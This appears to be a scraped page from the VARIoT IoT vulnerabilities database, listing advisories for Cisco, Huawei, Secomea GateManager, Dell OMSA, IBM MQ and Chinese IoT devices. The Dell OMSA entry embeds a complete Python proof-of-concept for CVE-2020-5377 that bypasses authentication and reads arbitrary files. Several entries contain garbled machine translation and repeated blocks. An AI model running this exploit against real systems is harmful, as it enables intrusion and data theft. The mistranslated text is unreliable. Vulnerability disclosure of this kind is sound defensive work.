VARIoT IoT vulnerabilities database

A vulnerability in the archive utility of Cisco Data Center Network Manager (DCNM) could allow an authenticated, remote attacker to conduct directory traversal attacks on an affected device. The vulnerability is due to a lack of proper input validation of paths that are embedded within archive files. An attacker could exploit this vulnerability by sending a crafted request to an affected device. A successful exploit could allow the attacker to write arbitrary files in the system with the privileges of the logged-in user. (DoS) It may be put into a state. Cisco Data Center Network Manager (DCNM) is a data center management system of Cisco (Cisco). The system is available for Cisco Nexus and MDS series switches and provides storage visualization, configuration and troubleshooting functions

Huawei FusionComput 8.0.0 have an improper authorization vulnerability. A module does not verify some input correctly and authorizes files with incorrect access. Attackers can exploit this vulnerability to launch privilege escalation attack. This can compromise normal service. Huawei FusionCompute Exists in a fraudulent authentication vulnerability.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state. Huawei FusionCompute is a computer virtualization engine developed by Huawei in China. The product provides Virtual Resource Manager (VRM) and Compute Node Agent (CNA), etc. Attackers can use this vulnerability to elevate their privileges and affect the normal service of the device

A vulnerability in Cisco SD-WAN Solution Software could allow an unauthenticated, remote attacker to cause a buffer overflow on an affected device. The vulnerability is due to insufficient input validation. An attacker could exploit this vulnerability by sending crafted traffic to an affected device. A successful exploit could allow the attacker to gain access to information that they are not authorized to access, make changes to the system that they are not authorized to make, and execute commands on an affected system with privileges of the root user. (DoS) It may be put into a state. Cisco SD-WAN Solution is a set of network expansion solutions of Cisco (Cisco)

A vulnerability in the web-based management interface of Cisco SD-WAN vManage Software could allow an authenticated, remote attacker to bypass authorization, enabling them to access sensitive information, modify the system configuration, or impact the availability of the affected system. The vulnerability is due to insufficient authorization checking on the affected system. An attacker could exploit this vulnerability by sending crafted HTTP requests to the web-based management interface of an affected system. A successful exploit could allow the attacker to gain privileges beyond what would normally be authorized for their configured user authorization level. The attacker may be able to access sensitive information, modify the system configuration, or impact the availability of the affected system. Cisco SD-WAN vManage The software contains vulnerabilities related to unauthorized authentication.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state. Cisco SD-WAN vManage Software is a management software for SD-WAN (Software Defined Wide Area Network) solutions from Cisco

GateManager versions prior to 9.2c, The affected product is vulnerable to an off-by-one error, which may allow an attacker to remotely execute arbitrary code or cause a denial-of-service condition. GateManager Is Secomea Provided by the company VPN It is a server. GateManager The following multiple vulnerabilities exist in. *NULL Part-Time Job Or NUL Improper invalidation of characters (CWE-158) - CVE-2020-14500 * Judgment of boundary conditions (CWE-193) - CVE-2020-14508 * Use of hard-coded credentials (CWE-798) - CVE-2020-14510 * Use of inadequately strong password hashes (CWE-916) - CVE-2020-14512The expected impact depends on each vulnerability, but it may be affected as follows. * A remote third party sends a negative value and overwrites any data - CVE-2020-14500 * A remote third party Off-by-one Causes an error, executes arbitrary code, or is in a denial of service (DoS) To be - CVE-2020-14508 *Telnet Credentials are hard coded by a remote third party who does not have administrator privileges root Command is executed with authority - CVE-2020-14510 * The user's password is referenced by a remote third party due to the use of a weak hash algorithm. - CVE-2020-14512

GateManager versions prior to 9.2c, The affected product contains a hard-coded credential for telnet, allowing an unprivileged attacker to execute commands as root. GateManager Is Secomea Provided by the company VPN It is a server. GateManager The following multiple vulnerabilities exist in. *NULL Part-Time Job Or NUL Improper invalidation of characters (CWE-158) - CVE-2020-14500 * Judgment of boundary conditions (CWE-193) - CVE-2020-14508 * Use of hard-coded credentials (CWE-798) - CVE-2020-14510 * Use of inadequately strong password hashes (CWE-916) - CVE-2020-14512The expected impact depends on each vulnerability, but it may be affected as follows. * A remote third party sends a negative value and overwrites any data - CVE-2020-14500 * A remote third party Off-by-one Causes an error, executes arbitrary code, or is in a denial of service (DoS) To be - CVE-2020-14508 *Telnet Credentials are hard coded by a remote third party who does not have administrator privileges root Command is executed with authority - CVE-2020-14510 * The user's password is referenced by a remote third party due to the use of a weak hash algorithm. - CVE-2020-14512. Secomea GateManager is a remote access server product of Secomea, Denmark. There is a trust management vulnerability in Secomea GateManager versions prior to 9.2c, which is caused by the program using hard-coded credentials. A remote attacker can use this vulnerability to execute commands with root privileges

GateManager versions prior to 9.2c, The affected product uses a weak hash type, which may allow an attacker to view user passwords. GateManager Is Secomea Provided by the company VPN It is a server. GateManager The following multiple vulnerabilities exist in. *NULL Part-Time Job Or NUL Improper invalidation of characters (CWE-158) - CVE-2020-14500 * Judgment of boundary conditions (CWE-193) - CVE-2020-14508 * Use of hard-coded credentials (CWE-798) - CVE-2020-14510 * Use of inadequately strong password hashes (CWE-916) - CVE-2020-14512The expected impact depends on each vulnerability, but it may be affected as follows. * A remote third party sends a negative value and overwrites any data - CVE-2020-14500 * A remote third party Off-by-one Causes an error, executes arbitrary code, or is in a denial of service (DoS) To be - CVE-2020-14508 *Telnet Credentials are hard coded by a remote third party who does not have administrator privileges root Command is executed with authority - CVE-2020-14510 * The user's password is referenced by a remote third party due to the use of a weak hash algorithm. - CVE-2020-14512. Secomea GateManager is a remote access server product of Secomea, Denmark

Secomea GateManager all versions prior to 9.2c, An attacker can send a negative value and overwrite arbitrary data. GateManager Is Secomea Provided by the company VPN It is a server. GateManager The following multiple vulnerabilities exist in. *NULL Part-Time Job Or NUL Improper invalidation of characters (CWE-158) - CVE-2020-14500 * Judgment of boundary conditions (CWE-193) - CVE-2020-14508 * Use of hard-coded credentials (CWE-798) - CVE-2020-14510 * Use of inadequately strong password hashes (CWE-916) - CVE-2020-14512The expected impact depends on each vulnerability, but it may be affected as follows. * A remote third party sends a negative value and overwrites any data - CVE-2020-14500 * A remote third party Off-by-one Causes an error, executes arbitrary code, or is in a denial of service (DoS) To be - CVE-2020-14508 *Telnet Credentials are hard coded by a remote third party who does not have administrator privileges root Command is executed with authority - CVE-2020-14510 * The user's password is referenced by a remote third party due to the use of a weak hash algorithm. - CVE-2020-14512

Dell EMC OpenManage Server Administrator (OMSA) versions 9.4 and prior contain multiple path traversal vulnerabilities. An unauthenticated remote attacker could potentially exploit these vulnerabilities by sending a crafted Web API request containing directory traversal character sequences to gain file system access on the compromised management station. The solution supports online diagnosis, system operation detection, equipment management, etc. A remote attacker could exploit this vulnerability to gain access to the file system. # CVE: CVE-2020-5377 # This is a proof of concept for CVE-2020-5377, an arbitrary file read in Dell OpenManage Administrator # Proof of concept written by: David Yesland @daveysec with Rhino Security Labs # More information can be found here: # A patch for this issue can be found here: # https://www.dell.com/support/article/en-us/sln322304/dsa-2020-172-dell-emc-openmanage-server-administrator-omsa-path-traversal-vulnerability from xml.sax.saxutils import escape import BaseHTTPServer import requests import thread import ssl import sys import re import os import urllib3 urllib3.disable_warnings() if len(sys.argv) < 3: print 'Usage python auth_bypass.py <yourIP> <targetIP>:<targetPort>' exit() #This XML to imitate a Dell OMSA remote system comes from https://www.exploit-db.com/exploits/39909 #Also check out https://github.com/hantwister/FakeDellOM class MyHandler(BaseHTTPServer.BaseHTTPRequestHandler): def do_POST(s): data = '' content_len = int(s.headers.getheader('content-length', 0)) post_body = s.rfile.read(content_len) s.send_response(200) s.send_header("Content-type", "application/soap+xml;charset=UTF-8") s.end_headers() if "__00omacmd=getuserrightsonly" in post_body: data = escape("<SMStatus>0</SMStatus><UserRightsMask>458759</UserRightsMask>") if "__00omacmd=getaboutinfo " in post_body: data = escape("<ProductVersion>6.0.3</ProductVersion>") if data: requid = re.findall('>uuid:(.*?)<',post_body)[0] s.wfile.write('''<?xml version="1.0" encoding="UTF-8"?> <s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:wsman="http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd" xmlns:n1="http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/DCIM_OEM_DataAccessModule"> <s:Header> <wsa:To>http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</wsa:To> <wsa:RelatesTo>uuid:'''+requid+'''</wsa:RelatesTo> <wsa:MessageID>0d70cce2-05b9-45bb-b219-4fb81efba639</wsa:MessageID> </s:Header> <s:Body> <n1:SendCmd_OUTPUT> <n1:ResultCode>0</n1:ResultCode> <n1:ReturnValue>'''+data+'''</n1:ReturnValue> </n1:SendCmd_OUTPUT> </s:Body> </s:Envelope>''') else: s.wfile.write('''<?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:wsmid="http://schemas.dmtf.org/wbem/wsman/identity/1/wsmanidentity.xsd"><s:Header/><s:Body><wsmid:IdentifyResponse><wsmid:ProtocolVersion>http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd</wsmid:ProtocolVersion><wsmid:ProductVendor>Fake Dell Open Manage Server Node</wsmid:ProductVendor><wsmid:ProductVersion>1.0</wsmid:ProductVersion></wsmid:IdentifyResponse></s:Body></s:Envelope>''') def log_message(self, format, *args): return createdCert = False if not os.path.isfile('./server.pem'): print '[-] No server.pem certifcate file found. Generating one...' os.system('openssl req -new -x509 -keyout server.pem -out server.pem -days 365 -nodes -subj "/C=NO/ST=NONE/L=NONE/O=NONE/OU=NONE/CN=NONE.com"') createdCert = True def startServer(): server_class = BaseHTTPServer.HTTPServer httpd = httpd = server_class(('0.0.0.0', 443), MyHandler) httpd.socket = ssl.wrap_socket (httpd.socket, certfile='./server.pem', server_side=True) httpd.serve_forever() thread.start_new_thread(startServer,()) myIP = sys.argv[1] target = sys.argv[2] def bypassAuth(): values = {} url = "https://{}/LoginServlet?flag=true&managedws=false".format(target) data = {"manuallogin": "true", "targetmachine": myIP, "user": "VULNERABILITY:CVE-2020-5377", "password": "plz", "application": "omsa", "ignorecertificate": "1"} r = requests.post(url, data=data, verify=False, allow_redirects=False) cookieheader = r.headers['Set-Cookie'] sessionid = re.findall('JSESSIONID=(.*?);',cookieheader) pathid = re.findall('Path=/(.*?);',cookieheader) values['sessionid'] = sessionid[0] values['pathid'] = pathid[0] return values ids = bypassAuth() sessionid = ids['sessionid'] pathid = ids['pathid'] print "Session: "+sessionid print "VID: "+pathid def readFile(target,sessid,pathid): while True: file = raw_input('file > ') url = "https://{}/{}/DownloadServlet?help=Certificate&app=oma&vid={}&file={}".format(target,pathid,pathid,file) cookies = {"JSESSIONID": sessid} r = requests.get(url, cookies=cookies, verify=False) print 'Reading contents of {}:\n{}'.format(file,r.content) def getPath(path): if path.lower().startswith('c:\\'): path = path[2:] path = path.replace('\\','/') return path readFile(target,sessionid,pathid)

ZLAN5102 and ZLAN5103 serial server are industrial grade RS232/485 and TCP/IP protocol converters produced by Shanghai ZLAN. ZLAN5102 and ZLAN5103 serial server have a denial of service vulnerability. Attackers can use this vulnerability to cause the device to restart.

Tvheadend is a streaming media server software installed under LINUX system. TVHeadend streaming media server has an unauthorized access vulnerability. Attackers can use this vulnerability to obtain sensitive information.

IBM MQ, IBM MQ Appliance, and IBM MQ for HPE NonStop 8.0, 9.1 CD, and 9.1 LTS is vulnerable to a buffer overflow vulnerability due to an error within the channel processing code. A remote attacker could overflow the buffer using an older client and cause a denial of service. IBM X-Force ID: 181562. Vendor exploits this vulnerability IBM X-Force ID: 181562 It is published as.Service operation interruption (DoS) It may be put into a state

IBM MQ, IBM MQ Appliance, and IBM MQ for HPE NonStop 8.0, 9.1 LTS, and 9.1 CD could allow under special circumstances, an authenticated user to obtain sensitive information due to a data leak from an error message within the pre-v7 pubsub logic. IBM X-Force ID: 177402. Vendor exploits this vulnerability IBM X-Force ID: 177402 It is published as.Information may be obtained

IBM MQ, IBM MQ Appliance, IBM MQ for HPE NonStop 8.0, 9.1 CD, and 9.1 LTS could allow an attacker to cause a denial of service due to a memory leak caused by an error creating a dynamic queue. IBM X-Force ID: 179080. Vendor exploits this vulnerability IBM X-Force ID: 179080 It is published as.Service operation interruption (DoS) It may be put into a state

IBM MQ Appliance 9.1.4.CD could allow a local attacker to obtain highly sensitive information by inclusion of sensitive data within trace. IBM X-Force ID: 172616. IBM MQ Appliance There is an information leakage vulnerability in. Vendor exploits this vulnerability IBM X-Force ID: 172616 It is published as.Information may be obtained

An authenticated remote attacker could use specially crafted URLs to send a victim using PI Vision 2019 mobile to a vulnerable web page due to a known issue in a third-party component. PI Vision Exists in a cross-site scripting vulnerability.Information may be obtained and tampered with

Tianyi Kandian is a security service that integrates camera, video, real-time monitoring, PTZ control, alarm, and storage. Tianyi Kandian camera has an unauthorized access vulnerability, which can be exploited by attackers to obtain sensitive information.

Shanghai ZLAN Information Technology Co., Ltd. is a high-tech enterprise providing industrial IoT solutions. The ZLAN serial server has an unauthorized access vulnerability. Attackers can use the vulnerability to log in to the WEB management interface without authorization.

Shenzhen Yichen Technology Co., Ltd. is a manufacturer and operator of network and communication equipment. The wireless router of Shenzhen Yichen Technology Co., Ltd. has an unauthorized access vulnerability. Attackers can use the vulnerability to perform unauthorized operations.

IBM MQ Appliance 9.1 LTS and 9.1 CD could allow a local privileged user to obtain highly sensitve information due to inclusion of data within trace files. IBM X-Force ID: 182118. IBM MQ Appliance There is an information leakage vulnerability in. Vendor exploits this vulnerability IBM X-Force ID: 182118 It is published as.Information may be obtained. IBM MQ Appliance is an all-in-one device from IBM in the United States for rapid deployment of enterprise-level messaging middleware. Local attackers can use this vulnerability to obtain highly sensitive information